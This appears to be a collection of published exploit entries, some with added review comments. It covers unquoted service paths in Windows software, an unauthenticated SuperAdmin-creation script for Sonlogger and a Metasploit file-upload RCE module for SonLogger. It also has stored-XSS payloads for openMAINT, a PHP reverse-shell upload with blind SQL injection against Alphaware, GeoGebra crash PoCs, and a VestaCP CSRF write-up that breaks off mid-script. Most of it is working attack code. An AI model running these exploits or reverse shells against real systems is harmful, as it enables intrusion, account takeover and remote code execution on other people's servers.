C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "QVR" | findstr /i /v """ QVRService QVRService C:\Program Files (x86)\QNAP\QVR\QVRService.exe Auto
# Service info:
C:\>sc qc "QVRService" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: QVRService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\QNAP\QVR\QVRService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : QVRService DEPENDENCIES : SERVICE_START_NAME : LocalSystem
#Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. Concretely: the unquoted path makes Windows try C:\Program.exe and C:\Program Files.exe before the real binary, and the service is AUTO_START as LocalSystem. Both candidate locations are the root of C:\, which standard users cannot write to on a default Windows 10 install, so this is only exploitable where that ACL has been weakened -- check with icacls before reporting it as a privilege escalation.
-
Realtek Wireless LAN Utility 700.1631 - 'Realtek11nSU' Unquoted Service Path
# Exploit Title: Realtek Wireless LAN Utility 700.1631 - 'Realtek11nSU' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2021-03-14
# Vendor Homepage: https://www.realtek.com/en/
# Tested Version: 700.1631
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Realtek" | findstr /i /v """ Realtek11nSU Realtek11nSU C:\Program Files (x86)\Realtek\Wireless LAN Utility\RtlService.exe Auto
# Service info:
C:\>sc qc "Realtek11nSU" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Realtek11nSU TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Realtek\Wireless LAN Utility\RtlService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Realtek11nSU DEPENDENCIES : SERVICE_START_NAME : LocalSystem
#Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. Concretely: the unquoted path makes Windows try C:\Program.exe, C:\Program Files.exe, C:\Program Files (x86)\Realtek\Wireless.exe and C:\Program Files (x86)\Realtek\Wireless LAN.exe before the real binary, and the service is AUTO_START as LocalSystem. All of these locations are admin-only on a default Windows install, so exploitability depends on the installer having left weak ACLs on C:\ or on C:\Program Files (x86)\Realtek\ -- check with icacls before reporting it as a privilege escalation.
-
eBeam education suite 2.5.0.9 - 'eBeam Device Service' Unquoted Service Path
# Exploit Title: eBeam education suite 2.5.0.9 - 'eBeam Device Service' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2021-03-14
# Vendor Homepage: https://www.luidia.com
# Tested Version: 2.5.0.9
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "eBeam" | findstr /i /v """ eBeam Device Service eBeam Device Service C:\Program Files (x86)\Luidia\eBeam Device Service\eBeamDeviceServiceMain.exe Auto
# Service info (Spanish-locale sc output; field names correspond to SERVICE_NAME, TYPE, START_TYPE, ERROR_CONTROL, BINARY_PATH_NAME, LOAD_ORDER_GROUP, TAG, DISPLAY_NAME, DEPENDENCIES, SERVICE_START_NAME):
C:\>sc qc "eBeam Device Service" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: eBeam Device Service TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Luidia\eBeam Device Service\eBeamDeviceServiceMain.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : eBeam Device Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. Concretely: the unquoted path makes Windows try C:\Program.exe, C:\Program Files.exe, C:\Program Files (x86)\Luidia\eBeam.exe and C:\Program Files (x86)\Luidia\eBeam Device.exe before the real binary, and the service is AUTO_START as LocalSystem. All of these locations are admin-only on a default Windows install, so exploitability depends on weak ACLs on C:\ or on C:\Program Files (x86)\Luidia\ -- check with icacls before reporting it as a privilege escalation.
-
Interactive Suite 3.6 - 'eBeam Stylus Driver' Unquoted Service Path
# Exploit Title: Interactive Suite 3.6 - 'eBeam Stylus Driver' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2021-03-14
# Vendor Homepage: https://www.luidia.com
# Software Link: http://down.myequil.com/dn/setup/ScrapBook_win/down.html
# Tested Version: 3.6
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "eBeam" | findstr /i /v """ eBeam Stylus Driver eBeam Stylus Driver C:\Program Files (x86)\Luidia\eBeam Stylus Driver\eBeam_Stylus_Driver.exe Auto
# Service info:
C:\>sc qc "eBeam Stylus Driver" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: eBeam Stylus Driver TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Luidia\eBeam Stylus Driver\eBeam_Stylus_Driver.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : eBeam Stylus Driver DEPENDENCIES : SERVICE_START_NAME : LocalSystem
#Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. Concretely: the unquoted path makes Windows try C:\Program.exe, C:\Program Files.exe, C:\Program Files (x86)\Luidia\eBeam.exe and C:\Program Files (x86)\Luidia\eBeam Stylus.exe before the real binary, and the service is AUTO_START as LocalSystem. All of these locations are admin-only on a default Windows install, so exploitability depends on weak ACLs on C:\ or on C:\Program Files (x86)\Luidia\ -- check with icacls before reporting it as a privilege escalation.
-
Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure
# Exploit Title: Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure
# Date: 04-02-2021
# Exploit Author: Berkan Er
# Vendor Homepage: https://www.sonlogger.com/
# Version: 4.2.3.3
# Tested on: Windows 10 Enterprise x64 Version 1803
# A remote attacker can create a user with the SuperAdmin profile.
#
# NOTE(review): none of the requests below carry a session cookie or any
# credentials (see commonHeaders), i.e. /shared/GetProductInfo,
# /User/getUsers and /User/saveUser are exercised unauthenticated.
# NOTE(review): the "TRUE" action makes a persistent change on the target (a
# new SuperAdmin account named _hacker); remove it after testing.
#!/usr/bin/python3

import argparse  # imported but never used
import string
import sys
# NOTE(review): this binds the *function* random.random, so the
# `random.choices(...)` call in get_random_string() raises AttributeError.
# `import random` was intended. The bug is latent because get_random_string()
# is never called.
from random import random

import requests
import json

banner = '''
Sonlogger Log and Report System - v4.2.3.3
Remote SuperAdmin Account Creation Vulnerability / Information Disclosure
Berkan Er <[email protected]>
@erberkan
'''

# Plain AJAX-style headers; no authentication material of any kind.
commonHeaders = {
    'Content-type': 'application/json',
    'Accept': 'application/json, text/javascript, */*; q=0.01',
    'X-Requested-With': 'XMLHttpRequest'
}


def get_random_string() -> str:
    """Return (and print) 8 random lowercase letters. Unused; see the import note above."""
    res = ''.join(random.choices(string.ascii_lowercase, k=8))
    print(res)
    return str(res)


def getProductInfo(host: str, port: str, flag: bool) -> bool:
    """Fetch product info and the user list; return True if the version is exactly 4.2.3.3.

    `port` is a string because it is concatenated into the URL. The user list
    is always requested, even when `flag` is False and nothing is printed.
    Raises KeyError if the response JSON has no 'Version' key.
    """
    response = requests.post('http://' + host + ':' + port + '/shared/GetProductInfo', data={}, headers=commonHeaders)
    print("[*] Status code: ", response.status_code)
    print("[*] Product Version: ", response.json()['Version'])
    info_json = json.dumps(response.json(), indent=2)
    response_1 = requests.post('http://' + host + ':' + port + '/User/getUsers', data={}, headers=commonHeaders)
    user_json = json.dumps(response_1.json(), indent=2)
    if flag:
        print("\n*** Product Infos=\n" + info_json)
        print("\n*** Users=\n" + user_json)
    # Exact-string match: other builds are reported as not vulnerable even if
    # they are; this is a version fingerprint, not a functional check.
    if response.json()['Version'] == '4.2.3.3':
        print("[+] It seems vulnerable !")
        return True
    else:
        print("[!] It doesn't vulnerable !")
        return False


def createSuperAdmin(host: str, port: str) -> None:
    """POST a new user with profile superadmin_profile and dump the user list afterwards.

    The payload uses single quotes, so it is not strict JSON even though it
    is sent as application/json; the server evidently accepts it on the
    tested version. Success is not checked -- the "created" message is
    printed regardless of the status code.
    """
    payload = '''{ '_profilename':'superadmin_profile', '_username':'_hacker', '_password':'_hacker', '_fullname':'', '_email':'' }'''
    response = requests.post('http://' + host + ':' + port + '/User/saveUser', data=payload, headers=commonHeaders)
    print("[*] STAUTS CODE:", response.status_code)
    print("[!] User has been created ! \nUsername: _hacker\nPassword: _hacker")
    response_1 = requests.post('http://' + host + ':' + port + '/User/getUsers', data={}, headers=commonHeaders)
    json_formatted_str = json.dumps(response_1.json(), indent=2)
    print("\n*** Users=\n" + json_formatted_str)


def main() -> None:
    """CLI entry point: <host> <port> <TRUE|FALSE>.

    NOTE(review): the bare `except:` below catches everything, so a network
    error, a non-JSON response or a missing 'Version' key is reported as a
    usage error rather than as what it is.
    """
    print(banner)
    try:
        host = sys.argv[1]
        port = sys.argv[2]
        action = sys.argv[3]
        if action == 'TRUE':
            if getProductInfo(host, port, False):
                createSuperAdmin(host, port)
        else:
            getProductInfo(host, port, True)
        print("KTHNXBYE!")
    except:
        print("Usage:\npython3 sonlogger-superadmin_create.py < IP > < PORT > < CREATE USER {TRUE / FALSE} >\n\nIP:\tIP " "Address of Sonlogger host\nPORT:\tPort number of Sonlogger host\nTRUE:\tCreate User\nFALSE:\tShow Product " "Infos")
        print("\nExample: python3 sonlogger-superadmin_create.py 192.168.1.10 5000 TRUE\n")


if __name__ == "__main__":
    main()
openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting
# Exploit Title: openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting # Date: 13/03/2021 # Exploit Author: Hosein Vita # Vendor Homepage: https://www.openmaint.org/ # Software Link: https://sourceforge.net/projects/openmaint/files/2.1/Core%20updates/openmaint-2.1-3.3.1/ # Version: 2.1-3.3 # Tested on: Linux # CVE: CVE-2021-27695 Summary: Multiple stored cross-site scripting (XSS) vulnerabilities in openMAINT 2.1-3.3-b allow remote attackers to inject arbitrary web script or HTML via any "Add" sections, such as Add Card Building & Floor, or others in the Name And Code Parameters. Proof of concepts : 1-Login to your Dashboard as a low privilege user 2-Click On Facilities and assets - Location - Sites 3- +Add card Building 4- Code and name parameters both are vulnerable POST /openmaint/services/rest/v3/classes/Building/cards?_dc=1615626728539 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json ..... Cookie: ... {"_type":"Building","_tenant":"","Code":"\"><img src=code onmouseover=alert(1)>","Description":null,"Name":"\"><img src=name onmouseover=alert(1)>",....} The XSS will trigger in that form, and also if you click on the "Map" button it will trigger there ------------------------------------------------------------------------ Another Xss : 1-Like above in Facilities click on Locations and click on complex 2-click + Add card Complex 3-insert javascript payload to Code And Name POST /openmaint/services/rest/v3/classes/Complex/cards?_dc=1615627279082 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json .... Connection: close Referer: Cookie: .... 
{"_type":"Complex","_tenant":"","Code":"\"><img src=complex onmouseover=alert(1)>","Description":null,"Name":"\"><img src=complex onmouseover=alert(1)>",...} 4-Save it 5-Back to Sites and click on previous card 6- in position section click on "Complex" drop down 7- xss will trigger ------------------------------------------------------------------------ Another Xss: 1-Like exmaples above go to Locations and click on Sites 2-Add Card Building or click the one you created before 3-in left menu click on "Relations" 4-click "Add relations" and select one of the options 5- Add Card and select one of the options 6- insert javascript payload to code and name parameter POST /openmaint/services/rest/v3/classes/Alarm/cards?_dc=1615628392695 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json Connection: close Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578 {"_type":"","_tenant":"","Code":"\"><img src=add relation onmouseover=alert(3)>","Name":"\"><img src=add relation onmouseover=alert(3)>","Description":null,..... 
} 7- save it and close the form 8-click on the card and there an option which is "Open Relation Graph" click on it and click on card list 9- xss payload will trigger ------------------------------------------------------ Another Xss: 1- In "Navigation" Bar click on "Configurations" 2- Click on parameter 3- + Add card Parameter 4- Insert javascript payload to Code and Value PUT /openmaint/services/rest/v3/classes/Parameter/cards/385606?_dc=1615629885175 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578 {"_type":"Parameter","_tenant":"","Area":null,"Code":"--'\"><img src=cardparameter onmouseover=alert(4)>","Description":null,"Value":"--'\"><img src=cardparameter onmouseover=alert(5)>",....} save it and like the previous one click on "Open Relation Graph" and in card List your xss will trigger ------------------------------------------------------- Another Xss: 1-Click Facilities and assets 2-Locations 3-Select one of cards 4-Click "Add Card" 5-in "Attachments" tab click "Add attachment" select "Document" or "image" 6-insert javascript payload in "Code" and "Description" PUT /openmaint/services/rest/v3/classes/Complex/cards/384220/attachments/apovsxflx4j269tx08h1eoayg2vn9eyhbfh06079bm37cr7uk63l75oetcmzc1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate CMDBuild-ActionId: class.card.attachments.open CMDBuild-RequestId: 52807186-932d-448b-bfe3-8a51b596bcb8 Content-Type: multipart/form-data; boundary=---------------------------1049383330380851725139941543 Content-Length: 1020 Connection: close Cookie: CMDBuild-Localization=en; 
CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578 -----------------------------1049383330380851725139941543 Content-Disposition: form-data; name="attachment"; filename="blob" Content-Type: application/json {"_....."Code":"--'\"><img src=attach onmouseover=alert(7)>","Description":"--'\"><img src=attach onmouseover=alert(7)>","...} -----------------------------1049383330380851725139941543-- 7-save it and xss will trigger
SonLogger 4.2.3.3 - Unauthenticated Arbitrary File Upload (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Unauthenticated upload of an .asp file through /Config/SaveUploadedHotspotLogoFile,
# followed by a GET to the fixed path /Assets/temp/hotspot/img/logohotspot.asp to run it.
# For defenders: an unauthenticated multipart POST to that endpoint (a non-image
# filename ending in .asp under a Content-Type of image/png) followed by a request for
# logohotspot.asp is the observable sequence. FileDropper is mixed in but nothing is
# registered for cleanup, so the uploaded file is left on the target.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::EXE
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SonLogger Arbitrary File Upload Exploit',
        'Description' => %q{
          This module exploits an unauthenticated arbitrary file upload via insecure POST request.
          It has been tested on version < 6.4.1 in Windows 10 Enterprise.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Berkan Er <[email protected]>' # Vulnerability discovery, PoC and Metasploit module
        ],
        'References' => [
          ['CVE', '2021-27964'],
          ['URL', 'https://erberkan.github.io/2021/SonLogger-vulns/']
        ],
        'Platform' => ['win'],
        'Privileged' => false,
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' => [
          [ 'SonLogger < 6.4.1', { 'Platform' => 'win' } ],
        ],
        'DisclosureDate' => '2021-03-01',
        'DefaultTarget' => 0
      )
    )
    register_options(
      [
        Opt::RPORT(5000),
        OptString.new('TARGETURI', [true, 'The base path to the SonLogger', '/'])
      ]
    )
  end

  # POST an empty body to /shared/GetProductInfo; the reply is expected to be JSON
  # carrying a 'Version' key (parsed in #check). No credential is sent.
  def check_product_info
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'),
      'method' => 'POST',
      'data' => '',
      'headers' => {
        'Accept' => 'application/json, text/javascript, */*; q=0.01',
        'Accept-Language' => 'en-US,en;q=0.5',
        'Accept-Encoding' => 'gzip, deflate',
        'X-Requested-With' => 'XMLHttpRequest'
      }
    )
  end

  # Version gate: anything below 6.4.1 is reported Vulnerable, else Safe.
  # A non-JSON body (e.g. a login page or an error page) is treated as an
  # unexpected reply rather than as Unknown.
  def check
    begin
      res = check_product_info
      unless res
        return CheckCode::Unknown('Target is unreachable.')
      end
      unless res.code == 200
        return CheckCode::Unknown("Unexpected server response: #{res.code}")
      end
      version = Gem::Version.new(JSON.parse(res.body)['Version'])
      if version < Gem::Version.new('6.4.1')
        CheckCode::Vulnerable("SonLogger version #{version}")
      else
        CheckCode::Safe("SonLogger version #{version}")
      end
    rescue JSON::ParserError
      fail_with(Failure::UnexpectedReply, 'The target may have been updated')
    end
  end

  # Wrap the generated executable in an ASP page so the web server runs it.
  def create_payload
    Msf::Util::EXE.to_exe_asp(generate_payload_exe).to_s
  end

  # Upload the ASP payload as a "logo" file, then request the fixed path where the
  # server stores it. The random filename sent in the form is not what is requested
  # afterwards, so presumably the server renames the upload to logohotspot.asp —
  # not verifiable from this module alone.
  def exploit
    begin
      print_good('Generate Payload')
      data = create_payload
      boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(5..14))}"
      post_data = "--#{boundary}\r\n"
      post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(rand(5..11))}.asp\"\r\n"
      post_data << "Content-Type: image/png\r\n"
      post_data << "\r\n#{data}\r\n"
      post_data << "--#{boundary}\r\n"
      res = send_request_cgi(
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'),
        'ctype' => "multipart/form-data; boundary=#{boundary}",
        'data' => post_data,
        'headers' => {
          'Accept' => 'application/json',
          'Accept-Language' => 'en-US,en;q=0.5',
          'X-Requested-With' => 'XMLHttpRequest'
        }
      )
      unless res
        fail_with(Failure::Unreachable, 'No response from server')
      end
      unless res.code == 200
        fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")
      end
      # The server signals a failed save inside an otherwise 200 JSON reply.
      json_res = begin
        JSON.parse(res.body)
      rescue JSON::ParserError
        nil
      end
      if json_res.nil? || json_res['Message'] == 'Error in saving file'
        fail_with(Failure::UnexpectedReply, 'Error uploading payload')
      end
      print_good('Payload has been uploaded')
      handler
      print_status('Executing payload...')
      # Short 5s timeout: the page is not expected to return once the payload runs.
      send_request_cgi({
        'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'),
        'method' => 'GET'
      }, 5)
    end
  rescue StandardError
    fail_with(Failure::UnexpectedReply, 'Failed to execute the payload')
  end
end
Alphaware E-Commerce System 1.0 - Unauthenticated Remote Code Execution (File Upload + SQL injection)
# Exploit Title: Alphaware E-Commerce System 1.0 - Unauthenticated Remote Code Execution (File Upload + SQL injection)
# Date: 15-03-2021
# Exploit Author: Christian Vierschilling
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11676/alphaware-simple-e-commerce-system.html
# Software Download: https://www.sourcecodester.com/download-code?nid=11676&title=Alphaware+-+Simple+E-Commerce+System+using+PHP+with+Source+Code
# Version: 1.0
# Tested on: PHP 7.4.14, Linux x64_x86
# --- Description --- #
#
# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.
# We combine this issue with an sql injection to retrieve the randomised name of our uploaded php shell.
# --- Proof of concept --- #
#!/usr/bin/python3

import random
import sys
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder


def file_upload(target_ip, attacker_ip, attacker_port):
    """Submit a product record whose 'product_image' part is a PHP file.

    The multipart POST goes to /alphaware/admin/admin_football.php with no
    session cookie, which is the unauthenticated-upload flaw described
    above. The upload response (r1) is not inspected. The random 9-digit
    product_code is returned so the caller can look up the stored row; the
    SQL in trigger_shell_sqli filters on product_id with that value.

    Defender notes: the server-side fix is to require an authenticated
    admin session on admin_football.php and to reject non-image uploads by
    content, not by the client-supplied Content-Type.
    """
    random_number = str(random.randint(100000000,999999999))
    file_name = "SHELL.php"
    revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port)
    m = MultipartEncoder(fields={'add': '', 'product_image': (file_name, revshell_string, 'application/x-php'),'product_code':random_number,'product_name':'R3v_5H3LL','product_price':'123','product_size':'99','brand':'N0_name','category':'Hackers','qty':'1'})
    print("(+) Uploading php reverse shell file ..")
    r1 = requests.post('http://{}/alphaware/admin/admin_football.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type})
    return random_number


def trigger_shell_sqli(target_ip,product_id):
    """Recover the stored image filename through a boolean-blind SQL
    injection in the 'username' field of /alphaware/function/admin_login.php,
    then request it under /alphaware/photo/ so the uploaded PHP runs.

    A 302 response is the oracle: it means the injected predicate was
    true. Step 1 finds the length of product_image for the row (up to
    199); step 2 recovers it one character at a time over ASCII 32..125.

    Defender notes: this step produces a burst of POSTs to admin_login.php
    whose 'username' begins with a single quote and a string of 302
    replies, followed by a GET under /photo/ for a .php name. The fix is
    a parameterised query in admin_login.php.
    """
    target_file_name = ''
    url = 'http://{}/alphaware/function/admin_login.php'.format(target_ip)
    print("(+) Now setting up our sqli for file name guessing ..")
    # STEP 1: Get length of target column in database ..
    for i in range(1, 200):
        payload = {'enter':'','username':"' or {}=(select char_length(product_image) from product where product_id = {})#".format(i, product_id)}
        r2 = requests.post(url, data=payload, allow_redirects=False)
        # STEP 2: successful sqli will be indicated by a redirect.. setting up our blind based file name guessing. :-)
        if str(r2.status_code) == '302':
            print("(+) Initial sqli successful, got length of our target file name!")
            print("(+) Now for the filename.. ", end = '')
            for j in range(1, i+1):
                for brutechar in range(32, 126):
                    payload = {'enter':'','username':"' or '{}'=(SELECT substring((SELECT product_image from product where product_id = {}),{},1))#".format(chr(brutechar),product_id,j)}
                    r3 = requests.post(url, data=payload, allow_redirects=False)
                    if str(r3.status_code) == '302':
                        target_file_name = target_file_name + chr(brutechar)
                        print(chr(brutechar), end = '')
                        sys.stdout.flush()
                        break
            # NOTE(review): the outer loop is not broken here, so the
            # remaining iterations keep POSTing to the reassigned url.
            url = 'http://{}/alphaware/photo/{}.php'.format(target_ip,target_file_name.split('.')[0])
            print("\r\n(+) Trying to trigger shell by requesting {} ..".format(url))
            r4 = requests.get(url)


def main():
    """Entry point: argv = target ip, attacker ip, attacker port."""
    if len(sys.argv) != 4:
        print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0])
        print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0])
        sys.exit(-1)
    target_ip = sys.argv[1]
    attacker_ip = sys.argv[2]
    attacker_port = sys.argv[3]
    product_id = file_upload(target_ip, attacker_ip, attacker_port)
    trigger_shell_sqli(target_ip, product_id)
    print("(+) done!")


if __name__ == "__main__":
    main()
GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC)
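# Exploit Title: GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC)
# Date: 2021-03-15
# Exploit Author: Brian Rodriguez
# Vendor Homepage: https://www.geogebra.org
# Software Link: https://www.geogebra.org/download
# Version: 6.0.631.0-offlinegraphing
# Tested on: Windows 8.1 Pro
# STEPS
# Open the program Graficadora
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt in the field "Entrada..."
# Crashed --> payload.py <--
#!/usr/bin/env python

# Writes 8000 'A' bytes to payload.txt in the working directory; the PoC is
# that pasting an input of this size into the "Entrada..." field crashes the
# application, i.e. the field has no length handling. Nothing else is done
# with the file.
buffer = "\x41" * 8000
try:
    # Context manager: the file is closed even if the write itself fails.
    with open("payload.txt", "w") as f:
        f.write(buffer)
    print("File created")
except OSError:
    # Only filesystem errors are expected here; anything else should surface.
    print("File cannot be created")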
GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)
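# Exploit Title: GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)
# Date: 2021-03-15
# Exploit Author: Brian Rodriguez
# Vendor Homepage: https://www.geogebra.org
# Software Link: https://www.geogebra.org/download
# Version: 5.0.631.0-d
# Tested on: Windows 8.1 Pro
#STEPS
# Open the program GeoGebra
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content in the field "Entrada:"
# Crashed --> payload.py <--
#!/usr/bin/env python

# Writes 800000 'A' bytes to payload.txt in the working directory; the PoC is
# that pasting an input of this size into the "Entrada:" field crashes the
# application, i.e. the field has no length handling. Nothing else is done
# with the file.
buffer = "\x41" * 800000
try:
    # Context manager: the file is closed even if the write itself fails.
    with open("payload.txt", "w") as f:
        f.write(buffer)
    print("File created")
except OSError:
    # Only filesystem errors are expected here; anything else should surface.
    print("File cannot be created")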
GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC)
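# Exploit Title: GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC)
# Date: 2021-03-15
# Exploit Author: Brian Rodriguez
# Vendor Homepage: https://www.geogebra.org
# Software Link: https://www.geogebra.org/download
# Version: 6.0.631.0-offlinecas
# Tested on: Windows 8.1 Pro
# STEPS
# Open the program Calculadora CAS
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt in the field "Entrada..."
# Crashed --> payload.py <--
#!/usr/bin/env python

# Writes 8000 'A' bytes to payload.txt in the working directory; the PoC is
# that pasting an input of this size into the "Entrada..." field crashes the
# application, i.e. the field has no length handling. Nothing else is done
# with the file.
buffer = "\x41" * 8000
try:
    # Context manager: the file is closed even if the write itself fails.
    with open("payload.txt", "w") as f:
        f.write(buffer)
    print("File created")
except OSError:
    # Only filesystem errors are expected here; anything else should surface.
    print("File cannot be created")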
VestaCP 0.9.8 - File Upload CSRF
# Exploit Title: VestaCP 0.9.8 - File Upload CSRF # Exploit Author: Fady Othman # Date: 16-03-2021 # Vendor Homepage: https://vestacp.com/ # Software Link: https://github.com/myvesta/vesta # Version: Vesta Control Panel (aka VestaCP) through 0.9.8-27 and myVesta through 0.9.8-26-39 # CVE ID: CVE-2021-28379 # Patch: https://github.com/myvesta/vesta/commit/3402071e950e76b79fa8672a1e09b70d3860f355 ## Description I found that the checks performed by the upload functionality are insufficient: the upload functionality is vulnerable to CSRF, and in addition it allows uploading files and creating folders under "/tmp" and under the home folder (usually "/home/admin"); the latter is the one that matters for this exploit to work. I was able to use this to create a ".ssh" folder in the admin home and upload an "authorized_keys" file, which allowed me to access the server later as "admin" using SSH. Since this relies on a *CSRF* the admin has to visit a link. Please note that *sshd* is already installed by *VestaCP* when using the default installation script, so there is no need to install it; also note that files can be replaced, so even if the admin has already added an "authorized_keys" file, it will be replaced with the attacker's file. Affected endpoint: "/upload/index.php", i.e. "/upload/index.php?dir=/home/admin/.ssh/" ## Steps to reproduce. 1. Install the latest version of VestaCP in your machine by following the instructions at https://vestacp.com/install/. 2. Login as the admin in Firefox, then open "exploit.html". 3. ssh into the machine using 'ssh -i id_rsa admin@victimmachine', now you have access as admin. 
# exploit.html
<html>
<head>
<script>
// CSRF proof of concept. When a victim whose browser holds a live VestaCP
// admin session loads this page, the browser attaches that session cookie
// (credentials: "include") to a cross-site POST against /upload/index.php,
// and the server writes the posted blob to the path named by the `dir`
// query parameter (/home/admin/.ssh/authorized_keys here). The posted
// content is an SSH public key.
//
// Server-side mitigation: require an anti-CSRF token on the upload endpoint
// and restrict `dir` to the intended upload locations; the patch linked in
// the advisory header is the reference fix. A SameSite cookie attribute on
// the session cookie would also stop this cross-site submission.
function exploit() {
